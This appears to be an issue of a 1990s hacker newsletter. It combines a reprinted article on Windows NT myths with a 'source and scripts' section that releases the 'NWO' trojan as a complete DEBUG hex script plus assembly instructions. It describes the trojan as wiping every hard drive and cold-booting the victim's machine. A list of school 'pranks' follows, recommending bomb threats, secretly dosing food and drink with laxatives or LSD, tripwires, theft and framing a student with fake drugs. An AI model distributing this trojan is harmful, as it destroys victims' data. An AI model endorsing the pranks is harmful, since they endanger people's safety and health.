Windows NT Workstation support falls short of Windows 95." Right conclusion, wrong numbers. In the interest of science, we pulled down the Windows 95 and NT 4.0 Hardware Compatibility Lists (HCL) and started counting. There are nearly 1,500 more entries on the Windows 95 HCL than on its NT 4.0 counterpart. Surprisingly, there are 397 more printers and 565 more analog modems on NT's HCL, leading one to suspect that those categories on the Windows 95 HCL haven't been updated recently. One in three x86 systems that work with Windows 95 sputters and dies when faced with NT. If you've got an older audio adapter or network card, you'll probably need to replace it before you upgrade your operating system. NT experts won't even think of purchasing hardware without checking the HCL. Now you know why. Lie 2 NT Is Less Secure Than Unix Judging by the flurry of headlines in the first half of 1997, the most popular sport on college campuses is hacking Microsoft software. This year's most serious NT security scare first popped up on newsgroups in March with the release of PWDump and NTCrack, a pair of homegrown utilities that let system administrators attack the encrypted password file on an NT machine in search of weak passwords. The story spread to the mainstream press at Internet speed after Electronic Engineering Times published a front-page story with the screaming headline "'Hack' punches hole in NT nets' security." The conclusion? System administrators should avoid NT in favor of the inherently safer Unix operating system. The EE Times story was riddled with technical errors, and it completely missed the point. Both Unix and NT have ample security features, including industrial-strength logon routines and well-protected file systems. Any idiot can configure any server--Unix or NT--so that its built-in security is compromised. The new utilities are simply NT versions of well-known Unix programs that sniff out insecure passwords by comparing them with entries in a dictionary. For a hacker to take advantage of NTCrack, he or she would first have to log on as a member of the Administrators group. And once an evildoer penetrates the network, there are far more interesting things to do than decode passwords. Lie 3 Upgrading from Win95 Is Easy The single most compelling new feature in NT 4.0 is the Windows 95 shell. So there's an easy upgrade path from Windows 95 to NT 4.0, right? Wrong. In fact, while upgrading to NT 4.0 from any older version of Windows or DOS is painless, installing NT over Windows 95 is impossible. Blame it on fundamental incompatibilities in the system registries for Windows 95 and NT. While you're at it, sprinkle a heaping helping of responsibility on Windows 95's anything-goes support for oddball hardware and virtual device drivers (VxDs). Because NT has no way to detect installed devices, doesn't recognize VxDs, uses incompatible hardware drivers, and may not recognize the file system in use, Microsoft wisely chose to not even try migrating the Windows 95 registry to Windows NT. If you're planning to move from Windows 95 to NT 4.0, here's what you have to do: First, check your system inventory against the official Microsoft NT Hardware Compatibility List (at www. microsoft. com/ hwtest), and make sure your main hard drive is formatted using the FAT file system. Next, install Windows NT into its own directory and reinstall every application as well. Even if you're exceptionally well organized, the upgrade will probably take several days from start to finish. Microsoft's Migration Market Bulletin sheepishly acknowledges the problem and offers this bold-faced promise: "Microsoft is completely committed to fixing this issue in the next major release of Windows NT Workstation." Now all they have to do is figure out how. Lie 4 NT Meets Military Standards Windows NT has earned a C2 rating from the U.S. National Security Agency (NSA), the spookiest of all the shadowy spy shops surrounding Washington, DC. That's an impressive accomplishment, but only if you look at how much red tape Microsoft had to go through to get there. In practical terms, the C2 rating is underwhelming at best. Here's why. As Microsoft freely admits, no operating system is ever C2-certified. Instead, the spymasters bestow C2 certification on a specific installation, and the computer's operating system is only one small piece of that puzzle. If you plan to install a C2-compliant system, don't expect to connect with the rest of the world, either-- Microsoft chose to submit NT 3.5 for C2 approval (NT 4.0 hasn't been tested yet) using the NSA's "Orange Book" testing procedures instead of the more stringent "Red Book." That saved time, but it means that NT is certifiably secure only without any network connections. Would you install a copy of NT Server without connecting it to another computer? Of course not. But as soon as you do, you lose the C2 rating. Gee, maybe Microsoft should have applied for the Catch-22 rating instead. . . Lie 5 NT is Robust and Crash-proof Everything's relative, especially when the topic turns to the stability of Windows. Is NT robust? Compared with Windows 95, it's as solid as Gibraltar. A buggy application locks up Windows 95 so tight only the power switch can undo the damage. Run the same ill-behaving app under NT, and the app itself vanishes in a puff of virtual smoke--leaving the rest of the system running without so much as a hiccup. Unfortunately, robust doesn't mean crash-proof. True, you reboot less often, but NT has a long way to go before it consistently achieves the uptime that Unix users take for granted. A buggy driver or a memory conflict in NT's internals typically results in STOP errors, also known as the Blue Screen of Death, a fatal listing of hexadecimal memory addresses and module names in bright white letters on a blue background. Even more insidious are memory leaks, which slowly drain resources from the operating system until performance becomes so sluggish that rebooting is the only alternative. Unfortunately, the Blue Screen of Death isn't rare. Microsoft has created a special Web-based troubleshooter to help you decode the top 15 STOP error messages. Most depressing of all, these crashes are so common that they've earned the ultimate in backhanded compliments--their own widely used acronym, BSOD. WINDOWS NT LIES By ED BOTT Garnered from ZDNet Pt. 2: Lie 6 NT Server Is Worth More One box is white, the other is blue. That's not the only distinction between NT Server (NTS) and NT Workstation (NTW), but you'll need to look at the code under a powerful microscope to find more substantial differences. NT has only one kernel, you see, and that core code is absolutely identical, no matter which version you install. Microsoft argues that NTS uses that kernel differently; according to Microsoft, the installation process for NTS makes as many as 700 subtle changes to entries in the NT registry, including memory- management settings and other configuration options. There's also a bundle of utilities and system service software in the NTS box that you won't find if you buy the lower-priced NTW package. But the biggest difference is monetary, not technical. At current street prices, you pay $450 extra--about a 150 percent premium--to install NTS instead of NTW. If you plan to run a Web server at your site, you're caught between a rock and a hard place: Even though third-party Web servers run just fine on NTW, Microsoft's license agreement won't let you legally run any server software if more than ten users will access the site simultaneously. The NTS license, on the other hand, allows unlimited connections to your Web server over the Internet; it also includes Microsoft's Internet Information Server 3.0, which eliminates the need for that third-party Web-server software. There's no technical barrier to stop you from simply ignoring the license agreement and running O'Reilly's WebSite or Netscape's FastTrack Server. Of course, you would be violating the Microsoft license agreement, and a disgruntled employee could turn you in to the Business Software Alliance, with consequences including stiff fines and public humiliation. But hey--it's your business. Lie 7 NT Works Great on a Notebook If you've grown accustomed to Windows 95's world-class support for portable PCs, your blood pressure will soar an hour into your first cross-country flight with an NT notebook. Windows 95 can dim the screen, shut down the hard drive, and turn off PC Card devices to squeeze extra life out of a battery. NT doesn't do power management, period--all systems run at full tilt until they can't run anymore. Windows 95 lets you swap PC Cards on the fly. NT has surprisingly good PC Card drivers, but you have to restart the system each time you add a new device if you expect the operating system to recognize it. Thanks to Windows 95's Plug and Play, you can slip a notebook out of its docking station, carry it down the hall to a meeting, and begin taking notes without missing a beat. NT forces you to reboot and choose a new hardware profile each time you change working environments. Microsoft promises NT 5.0 will be a better traveler. We'll see. Meanwhile, if you need to run NT on the road, ask IBM or Digital Equipment to show you the custom code they've written to handle power management and simulate Plug and Play. And be sure to stock up on extra batteries. Lie 8 NT Will Kill Windows 95 What do you get when you cross a conspiracy theorist with a technology analyst? Add a dash of paranoia to your basic business- school model, and it's easy to see patterns where none exist. Take Windows 95 and NT. When Windows 95 debuted, some analysts theorized that it was simply a placeholder that would quietly disappear when Windows NT 4.0, Microsoft's real strategic product, appeared. If that's true, then Windows 95 has been the most successful disposable consumer product ever introduced. Windows 95 and Windows NT have completely different target markets. The former is aimed directly at home users, for whom fun and games are a higher priority than productivity. Windows NT, on the other hand, requires a secure logon and refuses to acknowledge the existence of many games, which makes it a model citizen in the corporate world. Someday Windows 95 and NT will share a common code base. Just this year Microsoft product planners hinted that the merged kernel will be ready in 1999. Of course, those same sources predicted that Windows 4.0 would be on store shelves in mid-1994. Come back in 2001 and we'll tell you all about the latest updates to Windows 95 and Windows NT. Lie 9 Zero Administration Is Here Bill Gates has built an entire industry around mainframe-killing, terminal-replacing, do-it-all-on-the-desktop, industry-standard PCs. So longtime Windows watchers savored the irony when Microsoft announced its Zero Administration Windows initiative. The idea behind ZAW is simple: Rein in those maverick desktop PCs and put them back in the firm grip of network administrators, with preconfigured, locked-down systems. That's a convenient way to keep support personnel from having to rescue poor dumb users, but it's hard to imagine those users willingly surrendering their desktop PCs. Besides, it doesn't even begin to address the real burdens of PC ownership, which still requires hours of upfront administrative effort before a user can get to work. Zero Administration Windows? Is Microsoft kidding? Maybe it is. One press release from Microsoft makes this telling admission: "In effect, 'Zero Administration' means zero administration for users." Administrators still have to install Windows and approved applications on each user's PC, but they won't have to clean up after those darned users. What will network managers do Quake. Lie 10 Network PCs Will Kill NT If the computer industry didn't exist, high-tech honchos like Sun Microsystems' Scott McNealy, Oracle's Larry Ellison, and Microsoft's Bill Gates would probably have become pro wrestlers. They've certainly mastered the art of bluster, and the typical product demo, like a World Wrestling Federation pay-per-view extravaganza, bears only the most casual relation to reality. Take the tag-team match that has pitted the Oracle Network Computer and the Sun JavaStation against the Microsoft/Intel NetPC. Sun, which owns the Java programming language, argues that a fleet of users equipped with Web browsers can run any business, as long as Java is powering the servers. Oracle adds the technical flourish of an NC Card--a smart card that unlocks your personal profile on the network. Microsoft and Intel, of course, contend that Windows makes a perfectly good network computer (NC), once you trim away some of its extra features. Don't expect your desktop computer to disappear anytime soon, however. Dataquest, for example, forecasts that sales of network computers in all forms may hit a few million by the year 2000. By contrast, businesses and consumers are expected to buy more than 132 million PCs (most equipped with some version of Windows) in the first year of the millennium. Java is a work in progress, and it'll be years before it's widely used on desktop PCs. For most businesses NCs will replace aging mainframe terminals, not PCs. *** Thanks go to Nevada for sending us the above Windows NT article. {SOURCE} AND SCRIPTS - THE NWO TROJAN: This is the source code and debug scripts section. We're going to try to include a different virus, trojan or utility every month. Since this is the first issue of the Damage, INC. Newsletter, I thought we'd start by featuring a special trojan. The NWO trojan is in the spotlight this month. Damage, INC. is proud to release the debug script for New World Order. If you wanted or expected the source code, that's too fucking bad. ;) In order to use NWO, you'll need to clip out the debug script below and save it to a file called NWO.SCR. Then, execute DEBUG < NWO.SCR at a DOS prompt to assemble it. If you followed those instructions properly, you'll see a file named NWO.COM that is exactly 830 bytes. 40-HEX magazine often used this method for including viruses etc. It's the safest, easiest and best method to use in my opinion, thus Damage, INC. has chosen to use debug scripts. We decided to explain how to use DEBUG in case some readers are beginners and have no experience in this area. In future issues, we won't explain how to use this method in detail. Always remember: DEBUG < FILENAME.EXT - to assemble debug script files. ------------------------------------------------------------------------------ N NWO.COM E 0100 B8 52 17 BA 7E 01 3B C4 73 67 8B C4 2D 44 03 25 E 0110 F0 FF 8B F8 B9 A2 00 BE 7C 01 FC F3 A5 8B D8 B1 E 0120 04 D3 EB 8C D9 03 D9 53 33 DB 53 CB 0C 01 95 3F E 0130 57 63 4A A0 99 A8 FA 5C 9B FB 67 2B 94 AC 7F A2 E 0140 3B B2 5D 62 EA 81 7C 82 F1 0E 3D 39 3D 1F 9C D0 E 0150 2A D8 2F C7 A5 83 60 46 86 9F EC C8 2D 2C 9B 4E E 0160 6F 74 20 65 6E 6F 75 67 68 20 6D 65 6D 6F 72 79 E 0170 24 B8 00 09 BA 5F 01 CD 21 CD 20 90 FD 8B F8 4F E 0180 4F BE BE 02 03 F2 8B CA D1 E9 F3 A5 FC 87 F7 46 E 0190 46 BF 00 01 AD 95 BA 10 00 EB 32 90 AD 95 B2 10 E 01A0 EB 3B AD 95 B2 10 EB 3C AD 95 B2 10 EB 41 AD 95 E 01B0 B2 10 EB 63 AD 95 B2 10 EB 64 AD 95 B2 10 EB 65 E 01C0 AD 95 B2 10 EB 66 AD 95 B2 10 72 08 A4 D1 ED 4A E 01D0 74 F4 73 F8 33 C9 33 DB D1 ED 4A 74 BF D1 D3 D1 E 01E0 ED 4A 74 BE D1 D3 85 DB 74 17 D1 ED 4A 74 B9 D1 E 01F0 D3 80 FB 06 72 0B D1 ED 4A 75 04 AD 95 B2 10 D1 E 0200 D3 2E 8A 8F 1C 01 80 F9 0A 74 3A 33 DB 83 F9 02 E 0210 74 26 D1 ED 4A 74 97 72 1F D1 ED 4A 74 96 D1 D3 E 0220 D1 ED 4A 74 95 D1 D3 D1 ED 4A 74 94 D1 D3 80 FB E 0230 02 73 1E 2E 8A BF 2C 01 AC 8A D8 56 8B F7 2B F3 E 0240 F3 A4 5E EB 88 AC 02 C8 80 D5 00 3C FF 75 BC EB E 0250 33 D1 ED 4A 75 04 AD 95 B2 10 D1 D3 80 FB 08 72 E 0260 D2 D1 ED 4A 75 04 AD 95 B2 10 D1 D3 80 FB 17 72 E 0270 C2 D1 ED 4A 75 04 AD 95 B2 10 D1 D3 81 E3 DF 00 E 0280 86 DF EB B4 33 C0 06 BB 00 01 53 8B D8 8B C8 8B E 0290 D0 8B E8 8B F0 8B F8 CB 03 00 02 0A 04 05 00 00 E 02A0 00 00 00 00 06 07 08 09 01 02 00 00 03 04 05 06 E 02B0 00 00 00 00 00 00 00 00 07 08 09 0A 0B 0C 0D 90 E 02C0 00 00 B4 01 B9 00 20 CD 10 50 9C E4 60 E4 61 8A E 02D0 E0 A0 00 0C 80 E6 61 86 E0 04 9D FA B0 20 E6 20 E 02E0 00 00 58 E9 20 01 4E 57 4F 20 2D 20 4E 65 77 20 E 02F0 57 6F 00 3A 72 6C 64 20 4F 72 64 65 72 20 02 01 E 0300 0D 00 A0 0A 54 68 65 20 41 70 6F 63 61 6C 79 70 E 0310 73 00 6A 0B 69 73 20 6E 65 61 72 2E 1B 82 C2 19 E 0320 64 79 69 6E 67 24 74 69 6D A9 8A 1A 6F 4A 16 72 E 0330 65 44 A9 1E 59 6F 75 12 67 11 2A 55 0D 57 74 14 E 0340 B2 28 24 73 0E 22 61 6E 0F 25 A5 77 3F 6E 37 73 E 0350 26 4E 94 A8 31 79 2A 68 61 76 41 04 13 48 6F 20 E 0360 70 61 79 30 20 66 64 C1 75 63 6B 25 10 72 69 63 E 0370 65 9D 89 6E AF 24 72 6F 6A CA 82 46 32 4D 6A 75 E 0380 73 74 22 B3 74 75 6B 63 45 28 94 B9 73 79 10 65 E 0390 6D 2E 24 43 AC 02 0E 0A 0F 20 6F 66 20 50 A8 44 E 03A0 61 6D 61 67 3C 49 6E 63 8C A2 FC C7 72 61 18 64 E 03B0 AA 28 D8 6E 1C 05 73 70 D0 A5 4A 6B 4D 66 1C B1 E 03C0 74 E1 07 E2 6C 66 21 FC B4 03 B0 01 00 7E B5 00 E 03D0 B1 01 B6 00 B2 80 CD 13 0E B7 D4 01 0E FF 0E 02 E 03E0 75 FD 03 0E 03 01 0E 01 01 2A D5 75 46 81 03 46 E 03F0 81 03 46 3D 01 81 03 38 0E B2 02 E8 0F 00 E8 05 E 0400 00 0C 03 09 00 FE C2 80 FA 18 75 F0 EB 12 00 00 E 0410 52 8A C2 B9 88 13 33 D2 BB 21 01 CD 26 83 C4 02 E 0420 00 00 5A C3 B8 40 00 8E D8 B8 7F 7F A3 72 00 EA E 0430 00 00 F4 86 FF FF 00 FC 01 4C 07 06 00 FF RCX 033E W Q ------------------------------------------------------------------------------- NWO is a powerful trojan that nukes the cursor, keyboard, and all hard drives (C: to Z:) on the system. It also writes a New World Order message to every hard drive. Upon completion, it coldboots the victim's system. We recommend being cautious with NWO. Use at your own risk. Damage, INC. isn't responsible if you nuke yourself with anything that we release. In the next issue, we're planning to include a copy of RAZORBACK...if it has been fully tested and is ready. At any rate, enjoy NWO by Damage, INC. ú---[The Journalist's Top Ten List. ]---ú One of the regular features of the Damage, INC. Newsletter will be my top ten list. Yes I stole the idea from David Letterman, but who cares? :) This list will be funnier than his, so read on! After one of the shortest summers to date, school is back in, and for all you suckers out there who have to attend, there are a few simple things that can make school-life into a bearable day. But remember, in the event that you get caught, you cannot reveal anything regarding a "damaging" newsletter or some such shit. {TOP TEN} List of Pranks to pull at school: ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 1. At lunch hour, drop a *BANANA* (not a banana-peel) into a congested hallway. Watch as people walk over or around the banana, but when your mark is the high-school snob who keeps his/her nose pointed to the ceiling, you're sure to be in for a laugh. 2. A oldie but goodie, try and exchange the O'Canada tape for Adam Sandler or Howard Stern. It has to be something with bad taste, otherwise the joke just isn't fun! ;) 3. When a minor-niner asks you for directions, give him the directions to the principal's office, then go to an empty room and page the principals secretary. Tell her you are a new teacher here, and this student just started masturbating in class. Only do this to people who aren't suicidal ;) 4. Tie a strand of fishing line across the bottom of some stairs in the school somewhere. Sit back and laugh as people "launch" their books into the crowd of people. A good one to fuck over the much-hated "brown-noser" who deserves to have his perfect notes scattered around the floor for everyone to steal. 5. This one doesn't need much explanation - Go to the Party Hut in Stone Rd. Mall and pick up a box of stink bombs. If you execute this right, the school might have to be evacuated and you get to miss class. 6. Another way to miss class is call in a bomb threat from the payphone inside the school. You could even go to the lengths of creating a "fake" bomb, complete with ticking clock. Tell the authorities you will blow up the school if the principal does not admit to the students he used to fuck sheep when he was a kid. (make sure you get that one on videotape!) :) 7. Try your hand at lock-picking. You'd be surprised at how little guilt you feel over stealing a niner's new discman. 8. Sneak into the Cooking class and exchange flour for custard powder, cayenne pepper for baking soda. Fill the vanilla extract bottle with 40% Rum instead. And if you're really generous, you could even drop a few hits of acid in there. Once again, make sure your mark is not suicidal! ;) 9. Find the school's biggest browner, and when he's in the library (when *ISN'T* the geek in the library??) slip a book into his bag when he's not looking. The student will probably stroll right past the detectors, and BEEP BEEP BEEP! His face will go red, and you and your friends will be laughing hysterically in the corner. If you have a particular hatred for this guy, slip a homemade "sheet of acid" or a baggie full of oregano into his bag. Watch him talk his way out of that one! 10. Drop laxative into the new teacher's coffee. If you've never tried this before, do it! Such a simple manoeuvre can cause so much shit its hilarious ;) {CLOSING} COMMENTS: The first issue of the Damage, INC. Newsletter is now a reality and a success. The h/p scene in this area was lacking a source of information, and now we are providing it to everyone. A forum for the discussion of these topics was needed. It should be the duty of those in the local h/p scene to contribute articles and lend support to us. Otherwise, the h/p scene locally will weaken and slowly die a painful death... It's obvious that 519 is already infested with lamers, warez pups and politically correct idiots. They are the enemy. Don't allow them to take control of this area and destroy interest in h/p. With continued growth, the h/p scene in this area has the potential to become respected and powerful. That being said, Damage, INC. is proud to welcome The Journalist as our newest Member. We also have an announcement to make: Freedom of Information Archives is the new Damage, INC. Dist. Site. It will distribute our releases to Guelph and surrounding area. We were already the force in this area, but now Damage, INC. is *the* source for h/p information. We've grown and become even stronger. ;) In the next issue of the Damage, INC. Newsletter, look for articles about Big Brother and encryption, the Media, Bell, more h/p information, and more conspiracies and corruption being exposed. Also, we are planning to include the RAZORBACK trojan as well as a list of h/p web sites for you to check out. We're looking for Writers, Members and Distribution Sites. If you'd like to apply to Damage, INC. and join a respected h/p group, then download a copy of the Damage, INC. Application Generator. If you want any of our text releases, trojans and utilities they are available on the following boards: ...AND JUSTICE FOR ALL - Damage, INC. WHQ, h/p/a/c/v/t, no ratios, invite only. Freedom of Information Archives - Damage, INC. Dist. Site, h/p/a/c/v/t. In the future, we plan to setup the Damage, INC. web site to distribute our releases. If you have any comments or suggestions, contact us at one of the boards above. - EOF